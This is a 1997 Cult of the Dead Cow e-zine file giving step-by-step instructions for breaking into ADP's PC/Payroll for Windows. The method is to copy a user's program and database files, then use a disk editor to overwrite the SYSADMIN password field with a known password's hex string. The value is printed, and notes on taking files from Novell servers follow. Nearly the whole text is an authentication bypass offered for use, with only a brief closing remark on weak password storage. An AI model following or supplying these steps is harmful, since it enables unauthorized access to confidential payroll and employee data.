Copy Link
Add to Bookmark
Report
Cult of the Dead Cow 340
_
| \
| \
| | \
__ | |\ \ __
_____________ _/_/ | | \ \ _/_/ _____________
| ___________ _/_/ | | \ \ _/_/ ___________ |
| | _/_/_____ | | > > _/_/_____ | |
| | /________/ | | / / /________/ | |
| | | | / / | |
| | | |/ / | |
| | | | / | |
| | | / | |
| | |_/ | |
| | | |
| | c o m m u n i c a t i o n s | |
| |________________________________________________________________| |
|____________________________________________________________________|
...presents... Hacking PC/Payroll for Windows
by Tarkin Darklighter
09/01/1997-#340
__///////\ -cDc- CULT OF THE DEAD COW -cDc- /\\\\\\\__
\\\\\\\/ Everything You Need Since 1986 \///////
___ _ _ ___ _ _ ___ _ _ ___ _ _ ___
|___heal_the_sick___raise_the_dead___cleanse_the_lepers___cast_out_demons___|
I. Introduction
Automated Data Processing (ADP) is the nation's largest provider of
computerized payroll transaction processing. PC/Payroll for Windows is
ADP's client/server front end for AutoPay, which is in use by over
225,000 clients and 20 million employees (per ADP's 1996 annual report).
With PC/Payroll, you can either connect to a SQL server or use their
run-time SQL server engine to access a local database. If the company
in question is using either option the security is quite trivial.
When you execute PC/Payroll, you are asked for a user name and password.
The natural inclination in a case like this is to just "brute force"
your way into the program via a word list. Fortunately, there are some
major security flaws in their database structure.
So, let's get to it.
II. Tools
A. PC Payroll and its configuration
The first thing you'll need is a copy of PC/Payroll for Windows. If you
can't obtain the installation CD, you'll need to copy the \PCPW
directory from the user's hard drive or from the server. Also, be sure
and copy the MFCOLEUI.DLL file from the \WINDOWS\SYSTEM directory or you
won't be able to execute the program.
The actual payroll database file is usually stored in a subdirectory of
\PCPW. The default directory name is PAY4WIN and the default database
name is PAY4WIN.DBS. This database can get very large, so make sure you
have a lot of storage space available.
There are two INI files in the \PCPW directory that may be important:
SQL.INI and PAY4WIN.INI. Make sure that the entries in this file point
to the correct drive letter and directory on your system.
B. Disk editor
You'll also need a good disk editor to examine the database file. I
prefer Norton Disk Editor (DOS version 8.0), but remember that a lot of
these old editors won't work properly with the Win95's new FAT32 system.
You can really screw up your hard drive if you're not careful
III. Methodology
We're going to perform a basic "cut-and-paste" operation on the password
fields in the database. This is easily accomplished by creating a user
with a known password and copying their password field to the SYSADMIN's
password field.
The next question is exactly HOW to create a new user without actually
getting into the program first. Fortunately for us, ADP provides a SQL
database utility that will do just exactly that! We're going to create
a new database and then create a new user/password within that database:
To create a new database:
1. Start up the WINTALK.EXE utility.
2. Select Admin/Install Database.
3. Check the "Local" box.
4. Check the "New" box.
5. The Password field is not important. Just put whatever you want in
here.
6. Type in the name of a new database. (We'll use NEWDB in this
example.)
7. Click OK.
The new database should now be created. If you're having problems,
check the entries in the SQL.INI file.
Now, to create the user and password:
1. Select Session/Connect from within WINTALK.EXE.
2. Select NEWDB from the box on the left and click OK.
3. Select Security/New User from the menu bar.
4. Create a new user named SYSADMIN with password "PASSWORD" (it's not
case-sensitive) with DBA privileges and click OK.
5. Exit WINTALK.
The next step is to copy your new password into the original database
file. Let's take a look at the database:
Open the NEWDB.DBS file with your disk editor and search for the SECOND
instance of SYSADMIN. This is the Master User account that has full
access to everything in PC/Payroll.
The password field is located immediately after the user name. It's
made up of 16 hex numbers, beginning after a 10h. In our example above,
the hex numbers should read:
45 45 4B 46 4D 4B 46 48 4D 49 48 47 42 42 48 4B
You should get the same string of numbers if you used a password
of "PASSWORD". Write these numbers down.
Now, use your disk editor to open PAY4WIN.DBS. Search for the SECOND
instance of SYSADMIN again and locate the password field. If you can't
find a SYSADMIN user, locate the second instance of another user (like
the name of your payroll clerk) with sufficient privileges in
PC/Payroll.
All you have to do is to copy the string you created into the SYSADMIN's
password field, starting after 10h. Save your changes.
Start PAY4WIN.EXE, and login using SYSADMIN and PASSWORD. You should
have full access.
IV. Additional Notes
This hack has also been proven to work on Novell servers running SQL.
Just copy the database and log files from the server to your local
machine and proceed as above. Note that you will have to unload the SQL
NLM in order to grab the files. (You can copy them at will if the
server is running a utility like St. Bernard's Open File Manager).
V. Conclusion
I must admit, this is pretty weak security, especially for something as
important as payroll. Most companies guard their payroll information
VERY closely. There are a lot of ways ADP could have made this more
difficult. Simply encrypting the passwords using a unique number in
each database file would have been enough to make things much more
difficult!
.-. _ _ .-.
/ \ .-. ((___)) .-. / \
/.ooM \ / \ .-. [ x x ] .-. / \ /.ooM \
-/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\-
/lucky 13\ / \ / `-(' ')-' \ / \ /lucky 13\
\ / `-' (U) `-' \ /
`-' the original e-zine `-' _
Oooo eastside westside / ) __
/)(\ ( \ WORLDWIDE / ( / \
\__/ ) / Copyright (c) 1997 cDc communications and the author. \ ) \)(/
(_/ CULT OF THE DEAD COW is a registered trademark of oooO
cDc communications, PO Box 53011, Lubbock, TX, 79453, USA. _
oooO All rights reserved. Edited by Grandmaster Ratte'. __ ( \
/ ) /)(\ / \ ) \
\ ( \__/ Save yourself! Go outside! Do something! \)(/ ( /
\_) xXx BOW to the COW xXx Oooo
